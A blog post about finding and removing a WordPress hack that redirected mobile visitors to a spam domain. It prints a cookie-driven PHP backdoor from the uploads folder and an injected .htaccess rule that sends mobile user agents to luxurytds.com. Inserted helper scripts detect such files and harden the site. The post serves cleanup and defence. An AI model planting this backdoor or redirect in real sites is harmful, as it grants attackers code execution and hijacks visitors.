Fixing a WordPress Redirect Hack


So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device.

The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into thinking you’re an iPhone and trigger the redirect. I did just that, tried to look at the network events, JavaScript debugger, etc., but found nothing!
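Added example, not from the original post: the same mobile-versus-desktop check done from a terminal with curl, so the symptom (and later the fix) can be confirmed without DevTools. The site URL in the usage comment and both User-Agent strings are assumptions.

```shell
# Prints the Location header value from raw HTTP response headers read on stdin;
# empty output means no redirect. Tolerates CRLF line endings.
redirect_target() {
    tr -d '\r' | awk 'tolower($1) == "location:" { print $2; exit }'
}

# GET $1 with User-Agent $2, do not follow redirects, discard the body, keep the
# headers, and print the redirect target (if any).
probe() {
    curl -sS -o /dev/null -D - -A "$2" "$1" | redirect_target
}

# Assumed UA strings: an iPhone (what the device toolbar simulates) and a Linux Firefox.
UA_MOBILE="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
UA_DESKTOP="Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

# Succeeds (exit 0) only when the mobile client is redirected and the desktop client
# is not: the symptom described above. Re-run after cleanup to confirm the fix.
check_mobile_redirect() {
    desktop=$(probe "$1" "$UA_DESKTOP")
    mobile=$(probe "$1" "$UA_MOBILE")
    echo "desktop -> ${desktop:-(no redirect)}"
    echo "mobile  -> ${mobile:-(no redirect)}"
    [ -n "$mobile" ] && [ -z "$desktop" ]
}

# Needs network access, so it only runs when a URL is given, e.g.:
#   sh probe.sh https://blog.example/
if [ $# -eq 1 ]; then
    check_mobile_redirect "$1"
fi
```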

The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean. Then I turned my attention to the uploads folder.

I found this file and couldn’t figure out what it did.

daniel@bffserver [~]# cat psvkwrmv.php.fart
<?php

$oewzo=$_COOKIE;            // every cookie sent with the request
$ycke=$oewzo[zutc];         // cookie "zutc" is used as a function name
if($ycke){
 $ojaf=$ycke($oewzo[yzda]); // apply it to cookie "yzda" -> another callable
 $gpjc=$ycke($oewzo[kvyi]); // apply it to cookie "kvyi" -> a code/argument string
 $fyup=$ojaf("",$gpjc);     // combine the two into a new function
 $fyup();                   // and run it: a backdoor driven entirely by cookies
}

I ran it through the hex, base64, and php decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory.

Then I found the culprit! Here are the contents of the .htaccess file in the uploads directory:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]

You son of a bitch .htaccess file!

Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file that should look like this:

dverast@dougherty:~/danielverastiqui.com$ cat .htaccess

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

If you need to find all the affected .htaccess files quickly, you can use grep:

daniel@bffserver [~]# grep -lR "luxurytds.com" .
grep: ./access-logs: No such file or directory
./www/blog/backup-1408304576-wp-admin/.htaccess
./www/blog/backup-1408304576-wp-includes/.htaccess
./www/blog/backup-1500088171-wp-admin/.htaccess
./www/blog/backup-1500088171-wp-includes/.htaccess
./www/blog/wp-content/backup-1500088171-themes/.htaccess
./www/blog/wp-content/backup-1408304576-themes/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/.htaccess
./www/blog/wp-content/backup-1408304576-plugins/.htaccess
./www/cgi-bin/.htaccess
./public_html/blog/backup-1408304576-wp-admin/.htaccess
./public_html/blog/backup-1408304576-wp-includes/.htaccess
./public_html/blog/backup-1500088171-wp-admin/.htaccess
./public_html/blog/backup-1500088171-wp-includes/.htaccess
./public_html/blog/wp-content/backup-1500088171-themes/.htaccess
./public_html/blog/wp-content/backup-1408304576-themes/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess
./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess
./public_html/cgi-bin/.htaccess
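An added example (not the author's) that generalises the grep above: find every .htaccess with an off-site RewriteRule rather than one known domain, list PHP files under uploads and files shaped like the cookie-driven backdoor, then replace the uploads .htaccess with one that denies PHP. The sample tree, file names and the spam.example domain are constructed; the Apache 2.4 `Require` syntax is an assumption.

```shell
# .htaccess files under $1 containing a RewriteRule whose target is an absolute URL
find_redirect_htaccess() {
    find "$1" -type f -name .htaccess \
        -exec grep -lEi '^[[:space:]]*RewriteRule[[:space:]].*https?://' {} + 2>/dev/null || true
}

# Anything PHP-like under uploads, whatever it was renamed to (.php, .php5, .phtml, ...)
find_php_in_uploads() {
    find "$1/wp-content/uploads" -type f \( -iname '*.php*' -o -iname '*.phtml' \) 2>/dev/null || true
}

# Heuristic: files that read $_COOKIE and call a function held in a variable, $name($...),
# the shape of psvkwrmv.php above. Expect false positives; review each hit by hand.
find_cookie_backdoors() {
    find "$1" -type f \( -iname '*.php*' -o -iname '*.phtml' \) 2>/dev/null | while IFS= read -r f; do
        grep -q '\$_COOKIE' "$f" && grep -qE '\$[A-Za-z_][A-Za-z0-9_]*\(\$' "$f" && echo "$f"
    done || true
}

# Replacement uploads .htaccess (Apache 2.4 syntax is an assumption): deny PHP outright.
write_hardened_uploads_htaccess() {
    cat > "$1/wp-content/uploads/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|php[0-9])$">
    Require all denied
</FilesMatch>
EOF
}

# Constructed tree: clean root .htaccess, infected uploads .htaccess, cookie backdoor.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/wp-content/uploads/2018/07"
    printf 'RewriteEngine On\nRewriteRule . /index.php [L]\n' > "$t/.htaccess"
    printf 'RewriteCond %%{HTTP_USER_AGENT} iphone [NC]\nRewriteRule ^$ http://spam.example/go.php?sid=1 [R,L]\n' \
        > "$t/wp-content/uploads/.htaccess"
    printf '<?php\n$c=$_COOKIE;$f=$c["a"];if($f){$g=$f($c["b"]);$g();}\n' \
        > "$t/wp-content/uploads/2018/07/psvkwrmv.php"
    echo "$t"
}

TREE=$(make_sample_tree)
echo "off-site RewriteRule:"; find_redirect_htaccess "$TREE"
echo "PHP under uploads:";    find_php_in_uploads "$TREE"
echo "cookie backdoors:";     find_cookie_backdoors "$TREE"
write_hardened_uploads_htaccess "$TREE"; rm -rf "$TREE"
```

Run it against the real document root instead of the constructed tree by calling the three find_* functions with that path; the hardened .htaccess only blocks serving PHP, so the flagged files still need to be removed.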

After I deleted every .htaccess file and replaced them with the default or recommended versions, the site stopped redirecting. Success!

However:



Photo by Tom The Photographer on Unsplash